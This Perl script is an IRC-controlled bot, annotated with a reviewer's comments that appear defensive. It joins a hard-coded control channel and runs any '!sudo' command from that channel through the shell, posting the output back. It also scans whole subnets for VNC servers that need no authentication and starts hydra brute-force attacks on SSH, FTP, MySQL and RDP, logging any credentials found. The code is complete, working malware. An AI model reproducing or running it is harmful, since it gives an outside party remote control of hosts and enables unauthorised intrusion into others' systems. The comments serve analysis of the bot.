#For educational purposes or for use on your network only
#This script has been modified from the original source.
#Thanks to the real owner of it.
#Get on my IRC Network if you need explanations on how you can use this script.
#
# Reviewer notes (a defender's reading of this file):
#   * The process connects out to a hard-coded IRC server and channel ($ircnet,
#     $secureport, $canale below) and then executes commands it reads from that
#     channel -- an IRC-controlled bot. The trigger regexes are unanchored and
#     the sender is never inspected, so any line the server delivers can fire them.
#   * Observable signals: outbound TCP to the IRC port below, the constant USER
#     realname string sent at registration, a nick of the form "b0t<digits>",
#     a burst of up to 2**$splits forked processes, hydra child processes, and a
#     file named xploits.log in the working directory.

use IO::Socket;
use IO::Socket::INET;
use threads;            # loaded, but no thread is created anywhere in this file; work is split with fork() in DivideWork
use threads::shared;
use Errno qw(EAGAIN);
use warnings;           # NOTE: no 'use strict' -- the package globals below are unchecked
my $lines;              # unused at file scope; the !list handler declares its own lexical $lines
our @results : shared;  # per-host result strings, indexed by last octet (written in Scan_ALL)
our $todo = 0;          # work-slice index; doubled/incremented by every DivideWork fork
our $contatore = 0;     # never read in this file
my $orig_thread = "yes";   # set to "no" in forked children (DivideWork); never read afterwards
my $start;
my $end;
my $out_file;           # never used
my $range = 99999;
my $random_number = int(rand($range));
my @VNC_PORTS = qw/5900 5901 5902 5903 5904 5905 5906 5907 5908 5909/;   # ports probed by the VNC check in Scan_ALL
my @hydra_PORTS = ( [3306, 'MySQL'], [22, 'SSH'], [21, 'FTP'], [3389, 'RDP'] );   # [port, service] pairs handed to hydra
my $splits = 8; # Creates 2^N processes.
our $subnet;            # "a.b.c." prefix set by the !scan handler, read by Scan_ALL
my $nick = "b0t$random_number";# nick
my $secureport = "6667";           # plain IRC port despite the name; nothing here is encrypted
my $ircnet = "irc-1.iownyour.biz"; # hard-coded control server
my $canale = "#powercc";           # hard-coded control channel
my $answer;
# Connect to the control server; the bot cannot do anything without it, so die on failure.
my $sk = IO::Socket::INET->new(PeerAddr=>"$ircnet",PeerPort=>"$secureport",Proto=>"tcp") or die "Can not connect on server!\n";
$sk->autoflush(1);
# IRC registration. The realname string is constant and is a usable network signature.
print $sk "USER $nick 0 * :Robot made by independent \r\n";
print $sk "NICK $nick \r\n";

# Main command loop: every line received from the server is matched against each
# trigger in turn. The matches are substring matches anywhere in the raw IRC line.
while ($answer = <$sk>) {

    if($answer =~ m/^PING (.*?)$/gi) #Answer ping requests
    {
        # Also (re)joins the control channel on every PING.
        print $sk "PONG ".$1."\r\n";
        print $sk "JOIN $canale \r\n";
    }
    if ($answer=~ /!help/) {
        printa("Scan by independent: list , reload , die , sudo <cmd> , scan <ip>");
    }
    # !list: echo every line of the hydra output file that contains "host" to the channel.
    if ($answer=~ /!list/)
    {

        my $file = 'xploits.log';
        # NOTE: on open failure this only warns, so the loop below reads from an unopened handle.
        open my $fh, '<', $file or warn "Could not open '$file' $!\n";

        while (my $lines = <$fh>) {
            chomp $lines;
            if ($lines=~ /host/) {
                printa("$lines");
            }
        }
    }
    # !reload: single-string system() call, so it runs through the shell; it kills
    # every perl process (this one included) and relaunches scan.pl under sudo.
    if ($answer=~ /!reload/)
    {
        printa("Reloading...");
        my @cmd = ("sudo pkill perl && sudo perl scan.pl && sudo pkill hydra");
        system(@cmd);
    }
    # !die: kill all perl and hydra processes (again via the shell).
    if ($answer=~ /!die/)
    {
        printa("Dying...");
        my @cmd = ("sudo pkill perl && sudo pkill hydra");
        system(@cmd);
    }
    # !sudo <cmd>: remote command execution. The rest of the line is handed to
    # the shell unmodified, prefixed with sudo, and the output is posted back to
    # the channel. Nothing checks who sent the message.
    if ($answer=~ /!sudo\s+(.*)/)
    {
        my $command = $1;
        printa("Done: $command ");
        my $cmd = "sudo $command";
        my @output = `$cmd 2>&1 3>&1`;
        foreach(@output) {
            printa("$_\r\n");
        }
    }


    # !scan <a.b.c.*>: fork 2**$splits worker processes and probe every host in the /24.
    if ($answer=~ /!scan (.+)/)
    {


        $todo = 0;
        $subnet = $1;
        if ($subnet =~ m/^\d{1,3}\.\d{1,3}\.\d{1,3}\.?\*?/) {
            # Keep only the first three octets, then append the trailing dot.
            $subnet =~ s/^(\d{1,3}\.\d{1,3}\.\d{1,3}).*/$1/;
            $subnet .= ".";
            printa("Scanning subnet ${subnet}x\n");

            CHECK: {
                unless ($splits >= 0 && $splits <= 8) {
                    die "ERROR: Do not split $splits times--that makes no sense.\n";
                }
            }

            # Ugly, but this works.
            # Each call forks once, so after N calls there are 2**N processes, each
            # holding a distinct $todo in 0 .. 2**N-1.
            DivideWork() if $splits >= 1;
            DivideWork() if $splits >= 2;
            DivideWork() if $splits >= 3;
            DivideWork() if $splits >= 4;
            DivideWork() if $splits >= 5;
            DivideWork() if $splits >= 6;
            DivideWork() if $splits >= 7;
            DivideWork() if $splits >= 8;

            # Map this process's $todo onto its slice of the last octet. With
            # $splits == 8 each of the 256 processes gets exactly one host.
            $start = $todo << (8 - $splits);
            $end = $start + (256 / (2**$splits)) - 1;

            foreach ($start .. $end) {

                Scan_ALL($_);

            }
        }

        else {
            printa("Are you brain-dead? Use a correct IP format. ");
        }

    }

}
####################################

# Fork once, splitting the work index. After the call the parent holds
# 2*$todo+1 and the child 2*$todo, so repeated calls leave every resulting
# process with a distinct index. Reads and writes the file-level globals
# $todo and $orig_thread; reports a hard fork failure via printa().
sub DivideWork {
    my $pid;

    FORK: {
        # NOTE: this statement is inside the block that 'redo FORK' restarts, so a
        # recoverable fork failure doubles $todo a second time before retrying.
        $todo *= 2;
        if ($pid = fork) {
            # Parent
            ++$todo;

        } elsif (defined $pid) {
            # Child
            $orig_thread = "no";

        } elsif ($! == EAGAIN) {
            # Recoverable forking error.
            sleep 7;
            redo FORK;

        } else {
            # Unable to fork.
            # Only reported to the channel; the caller continues single-process
            # with the already-doubled $todo.
            printa("Unable to fork: $!\n");

        }
    }
}



# Probe one host (last octet $hostnum, prefix taken from the global $subnet):
# first attempt an RFB/VNC handshake on each port in @VNC_PORTS, then, for the
# first port in @hydra_PORTS that accepts a TCP connection, hand the host to an
# external hydra process. Findings are posted to the IRC channel via printa()
# and recorded in @results; hydra's own output is appended to xploits.log in the
# working directory. Returns nothing.
sub Scan_ALL {
    my $hostnum = shift;
    my $host = $subnet . $hostnum;
    my $sock;          # never assigned: both loops declare their own $sock, so the close() at the end sees undef
    my $proto_ver;     # 12-byte RFB version banner read from the server
    my $ignored;
    my $auth_type;
    my $sec_types;
    my $vnc_data;
    $host or printa("ERROR: missing Host IP address Scan_ALL.");   # reports only; execution continues

    # The host numbers .0 and .255 are reserved; ignore them.
    if ($hostnum <= 0 or $hostnum >= 255) { return; }

    # Format things nicely--that crazy formula just adds spaces.
    $results[$hostnum] = "$host";
    $results[$hostnum] .= (" " x (4 - int(log($hostnum)/log(10)))) . " = ";
    # VNC check: walk the RFB handshake offering only security type 1 ("none")
    # and treat any non-zero 4-byte reply after ClientInit as an accessible server.
    foreach my $porti (@VNC_PORTS)
    {
        if (my $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $porti, Proto => 'tcp')) {

            $sock->read($proto_ver, 12);
            print $sock $proto_ver;

            # Get supported security types and ignore them.
            $sock->read($sec_types, 1);

            $sock->read($ignored, unpack('C', $sec_types));
            # Claim that we only support no authentication.
            print $sock "\x01";


            # We should get "0000" back, indicating that they won't fall back to no authentication.
            $sock->read($auth_type, 4);

            # Client initialize.
            print $sock "\x01";

            # If the server starts sending data, we're in.
            $sock->read($vnc_data, 4);
            # NOTE: posted for every open VNC port, before the outcome is known.
            printa("[Xploiting VNC] $host");
            if (unpack('I', $vnc_data)) {
                $results[$hostnum] .= "VNC Vulnerable: $proto_ver\n";
                printa("9,3 [ $porti ] $results[$hostnum] $porti ");
            }
        }
    }
    # Brute-force hand-off: a bare TCP connect decides whether hydra is launched.
    # The command is a single string, so it runs through the shell; hydra output
    # is appended to xploits.log, which the !list handler reads back.
    foreach my $porti (@hydra_PORTS)
    {
        if (my $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $porti->[0], Proto => 'tcp')) {
            close($sock);
            printa("[Cracking " . $porti->[1] . "] $host");
            my @cmdhydra = ("sudo hydra -F -L /user -P /pass $host " . lc($porti->[1]) . " -s " . $porti->[0] . " -v -t 4 -W3 >>xploits.log");
            system(@cmdhydra);
            return;   # one hydra run per host; remaining services are not tried
        }
    }

    close($sock);
    return;
}

# Post one PRIVMSG to the control channel over the global IRC socket $sk.
# Takes a single argument, the message text. The leading "4,5" reads like an
# IRC colour code whose \x03 control byte was probably lost when the script
# was pasted -- confirm against the original before relying on it.
sub printa {
    print $sk "PRIVMSG $canale :4,5 $_[0]. \r\n";
}